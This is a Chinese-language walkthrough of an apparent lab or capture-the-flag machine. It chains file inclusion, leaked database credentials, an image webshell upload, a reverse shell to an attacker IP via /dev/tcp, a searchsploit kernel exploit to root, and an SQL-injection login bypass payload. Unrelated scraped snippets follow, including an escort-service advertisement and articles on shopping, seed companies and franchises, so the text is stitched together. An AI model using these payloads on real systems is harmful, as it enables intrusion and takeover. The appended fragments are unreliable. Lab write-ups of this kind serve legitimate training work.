使用nmap或netdiscover扫描确定其ip
访问其80端口
发现是一个登入界面,使用御剑后台扫描工具和kali的dirb扫描网站目录
御剑扫描结果:
dirb扫描结果:
现在收集到的信息有:
http://192.168.220.143/add.php文件上传
http://192.168.220.143/in/? ? phpinfo()
http://192.168.220.143/phpmyphpMyAdmin
http://192.168.220.143/test文件包含
访问192.168.220.143/test.php使用brup抓包
将请求 *** 改为post
在Params中加参数file和对应的内容
单包发送,得到对应文件的内容
证明该页面存在文件包含漏洞,查看c.php(猜测可能是配置文件)
得到数据库连接用户名密码,在phpMyAdmin页面使用用户名密码登入
成功登入,得到登入web界面的用户名密码
成功登入web界面
选择添加用户,发现可以上传文件,开始上传一句话图片木马
访问http://192.168.220.143/panel.php?1=phpinfo(); 使用brup抓包,修改load参数为图片地址
发现成功显示了phpinfo() ,说明可以反弹shell
使用brup的编码模块对echo 'bash -i >& /dev/tcp/192.168.220.146/4444 0>&1' | bash进行url编码
注意:ip是kali的ip,端口是监听的端口,要写单引号
在kali中开启监听
使用burp构造payload,点击Go访问
注意:url编码的代码要加到system("");里
成功反弹shell
查看那个目录有写权限,打算写一个一句话木马
进入uploaded_images目录,写木马
拿到webshell,查看系统和内核版本
使用kali的searchsploit命令搜索提权代码,使用37292.c提权,下载文件到kali
然后拷贝到真机,绕后通过菜刀上传到目标机器
编译提权文件
执行编译后的执行文件,成功提权到root权限
爆破phpmy目录下的文件
使用文件包含漏洞,查看config.inc.php文件内容
可以看到账号密码,直接使用此账号密码ssh连接目标主机,拿到root权限
使用文件包含漏洞查看index.php源码,分析其过滤规则,然后构造payload绕过
最后测试出uname=or 1=1#? pass=\? ? 能成功登入
加 \ 号是为了让后面的unmae逃逸出来,使用此payload的后的sql语句:
select * from auth where pass='\' and uname=' or 1=1#'
现在安装win7系统的用户越来越多,而在安装过程中遇到的问题也就越多,就有用户在安装win7系统的时候,提示示“无法更新启动配置”,导致无法安装win7系统,该怎么解决这样的问题呢?下文就给大家带来安...
“伴游公务舱空姐-【魏光琴】” 星座:摩羯座“北京高端商务预约价格:589”小编就为大家分享到这里了,想了解更多咨询可以添加联系方式咨询。身高:180cm点击收藏全国空姐商务预约费用是多少510320...
近期大伙儿都会刚开始疯狂购物,但是有些人表明实际上网上购物的觉得就跟爱情一样,但是说网上购物像极了爱情代表什么意思呢,我就而言讲吧。 网上购物像极了爱情代表什么意思 感情:零晨2点不舍得目标...
美国种业变形记 本报驻华盛顿记者 关晋勇 在世界排名前十位的种业公司中,美国企业占比不小。这辉煌业绩的历史,其实不过90年。从普通农户自留种子到出现跨国集团,美国种业经历了深刻的...
此刻的麻辣烫行业成长的很是好,紧跟着时代的潮水时尚的因素不绝的与时俱进的成长,不绝的为加盟品牌找到新的成长偏向,那么此刻的麻辣烫加盟品牌产物种类分富厚,顾主拥有更多选择的时机,许多消费者都可以选择本身...
即将步入中年,家庭消费指数上涨,开始研究哪种方式最赚钱? 投资房地产?投资股票?投资基金和网贷? 不仅是每个当代年轻人,就连上市的大公司、努力经营的小公司都逃离不了的魔咒! 连续两年亏损的“...